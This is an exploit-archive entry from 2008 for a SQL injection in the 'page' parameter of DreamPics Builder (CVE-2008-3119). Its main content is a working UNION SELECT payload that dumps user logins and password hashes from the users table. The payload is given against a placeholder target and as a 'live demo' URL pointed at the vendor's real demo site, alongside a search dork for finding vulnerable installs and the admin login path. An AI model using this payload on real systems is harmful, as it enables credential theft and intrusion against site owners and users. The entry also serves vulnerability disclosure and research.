DreamPics Builder - 'page' SQL Injection
Author: Hussin X
type: webapps
platform: php
port:
date_added: 2008-07-08
date_updated: 2016-12-13
verified: 1
codes: OSVDB-46877;CVE-2008-3119
tags:
aliases:
screenshot_url:
application_url:
#########################################################
#
# PICS BUILDER (page) SQL Injection Vulnerability
#========================================================
# Author: Hussin X =
# =
# Home : www.tryag.cc/cc =
# =
# email: darkangel_g85[at]Yahoo[DoT]com =
# =
#=========================================================
#
# script : http://www.dreamlevels.com/dreampics.php
#
# DorK : powered by Dreampics Builder
#
##########################################################
Exploit:
www.[target].com/Script/?page=-2+union+select+null,null,null,null,concat_ws(0x3a,user_login,user_password),null,null,null+from+users--
L!VE DEMO:
http://www.dreamlevels.com/demo/photosite/?page=-2+union+select+null,null,null,null,concat_ws(0x3a,user_login,user_password),null,null,null+from+users--
Admin Login :
/admin/
########################( Greetz )###########################
# #
# tryag.cc / DeViL iRaQ / IRAQ DiveR/ IRAQ_JAGUR /str0ke #
# #
# Iraqihack / FAHD / mos_chori / Silic0n #
# #
#############################################################
Im IRAQi
# milw0rm.com [2008-07-09]